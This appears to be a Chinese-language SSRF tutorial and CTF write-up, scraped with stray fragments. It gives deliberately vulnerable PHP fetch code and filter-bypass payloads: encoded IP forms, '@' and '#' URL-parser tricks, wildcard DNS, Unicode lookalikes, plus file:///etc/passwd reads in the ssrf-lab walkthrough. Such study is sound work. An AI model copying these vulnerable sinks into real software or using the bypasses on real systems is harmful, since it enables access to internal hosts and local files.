sqli
, printer
的 web service）
file_get_contents()
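<?php
// INTENTIONALLY VULNERABLE SSRF demo (file_get_contents sink). The URL is
// taken straight from the request and fetched with whatever stream wrappers
// PHP has enabled (http://, file://, php://, ftp:// ...), so it can reach
// internal hosts and local files; the http wrapper also follows redirects by
// default. Do not reuse outside a lab.
$img = ''; // initialised up front: the original only assigned it inside the
           // branch, so the echo below raised an undefined-variable notice on GET
if (isset($_POST['url'])) {
    // SSRF sink: no scheme/host allow-list, no DNS/IP check.
    $content = file_get_contents($_POST['url']);
    if ($content !== false) {
        // rand() is not cryptographically random; the stored name is guessable.
        // NOTE(review): ';img1.jpg' looks like a typo for '.img1.jpg' — confirm
        // against the lab source before changing it.
        $filename = './images/'.rand().';img1.jpg';
        // Whatever the remote returned is stored under a web-served path.
        file_put_contents($filename, $content);
        $img = "<img src=\"".$filename."\"/>";
    }
    // Reflect the requested URL back; escaped so the demo is not also a
    // reflected-XSS hole (the original echoed it raw into the page).
    echo htmlspecialchars($_POST['url'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
echo $img;
?>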
fsockopen()
<?php
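/**
 * Open a raw TCP connection to $host:$port and issue one HTTP/1.1 GET for
 * $link, returning the whole response (status line, headers and body).
 *
 * SSRF sink for the lab: $host and $port are caller-controlled, so this will
 * talk to internal hosts and to non-HTTP services just as readily. $host and
 * $link are also spliced into the request text unescaped, so a CR/LF in either
 * lets the caller inject extra headers or a second request — left as-is on
 * purpose, since that is the behaviour the page demonstrates.
 *
 * @param string $host  target host (name or IP); also used verbatim in the Host header
 * @param mixed  $port  target port, coerced with intval()
 * @param string $link  request-target placed after "GET "
 * @return string|null  raw response, or null (after echoing the error) when the
 *                      connection could not be opened
 */
function GetFile($host,$port,$link) {
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr (error number $errno) \n";
        return null;
    }
    // fsockopen()'s 30 s covers the connect only; without a read timeout a
    // server that accepts and then stalls would hang the loop below forever.
    stream_set_timeout($fp, 30);
    $out = "GET $link HTTP/1.1\r\n";
    $out .= "Host: $host\r\n";
    $out .= "Connection: Close\r\n\r\n";
    $out .= "\r\n";
    fwrite($fp, $out);
    $contents = '';
    while (!feof($fp)) {
        $chunk = fgets($fp, 1024);
        if ($chunk === false) {
            // read error or timeout: stop rather than spin on a stream that
            // may never report EOF
            break;
        }
        $contents .= $chunk;
    }
    fclose($fp);
    return $contents;
}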
?>
curl_exec()
curl
requests url，放到 server 上
<?php
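if (isset($_POST['url'])) {
    // INTENTIONALLY VULNERABLE SSRF demo (curl sink). The URL comes from the
    // request unchanged and cURL is not restricted with CURLOPT_PROTOCOLS, so
    // besides http(s) the dict://, gopher://, file:// ... schemes listed below
    // are reachable. Do not reuse outside a lab.
    $link = $_POST['url'];
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj, CURLOPT_URL, $link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); // hand the body back instead of printing it
    $result = curl_exec($curlobj);
    $curlError = curl_error($curlobj); // must be read before curl_close()
    curl_close($curlobj);
    if ($result === false) {
        // The original wrote an empty file and printed nothing on failure, so
        // a blocked or failed fetch looked the same as an empty response.
        echo 'curl failed: '.htmlspecialchars($curlError, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    } else {
        // rand() is not cryptographically random; stored names are guessable.
        $filename = './curled/'.rand().'.txt';
        file_put_contents($filename, $result);
        // The response is echoed raw (that is the point of the demo): anything
        // the fetched server returns lands unescaped in this page.
        echo $result;
    }
}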
?>
dict://
gopher://
file://
0300.0250.0.1
0xC0.0xA8.0.1
3232235521
0xC0A80001
（以上四種寫法——八進位點分、十六進位點分、十進位整數、十六進位整數——解析後都等同於 192.168.0.1，因此能繞過只比對 "192.168.0.1" 字串的黑名單）
http://www.google.com@192.168.0.1/
=> http://192.168.0.1
=> 192.168.0.1
（`@` 之前的 www.google.com 是 userinfo，真正連線的 host 是 `@` 之後的 192.168.0.1）
xip.io
http://127.0.0.1.xip.io/
=> http://127.0.0.1/
（xip.io 這類萬用 DNS 服務已停止運作，可改用 nip.io 或 sslip.io，用法相同：任何內嵌 IP 的子網域都會解析到該 IP）
127。0。0。1
=> 127.0.0.1
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> example.com
（全形句號、圓圈字母等通常會在 IDNA/NFKC 正規化時被轉成一般 ASCII，所以能繞過只比對原始字串的黑名單）
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴
⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
詳情的繞過姿勢可以參考: https://github.com/w181496/Web-CTF-Cheatsheet#ssrf
basics
, advanced1
, advanced2
, advanced3
，環境架設除了 basics 使用 docker run 之外，其餘都要用 docker-compose 才跑得起來，也可以參考此篇；需要先安裝 docker 與 docker-compose。
安裝ctf環境
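# Clone the lab and bring the ctf environment up with docker-compose.
# The clone lands in the current directory, so cd into it relative to here
# (the original `cd ~/ssrf-lab/ctf` only worked when run from $HOME).
git clone https://github.com/m6a-UdS/ssrf-lab.git
cd ssrf-lab/ctf || exit 1
docker-compose up -d   # on newer Docker installs the command is `docker compose up -d`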
這關似乎要部署在 Amazon 的伺服器上才能測試，這邊我沒有設定 Flag，有興趣的可以自行設定。
code可以參考這個連結
http://secret1.corp
/etc/passwd
，用到之前學到的 file:// 協議：file:///etc/passwd
10.0.0.38
,要去讀取secret3.corp
if '10.0.0.38' in url or 'secret2.corp' in url:
return 'Restricted Area!'
http://10.38
http://0x0a.0.0.26
http://0x0a000026
http://167772198
（以上皆等同 10.0.0.38：省略中間 octet 的簡寫、十六進位點分、十六進位整數、十進位整數。URL 裡不含 "10.0.0.38" 這個字串，所以上面的子字串黑名單擋不住）
url = request.form['handler']
host = urlparse.urlparse(url).hostname
if host == 'secret3.corp':
return 'Restricted Area!'
else:
return urllib.urlopen(url).read()
`#` 之前的部分能夠繞過 hostname 檢查（urlparse 只看 `#` 之前的 netloc，hostname 會是 google.com），反而 `@` 之後的才是 urllib.urlopen 真正要連線的 server：
http://google.com# @secret3.corp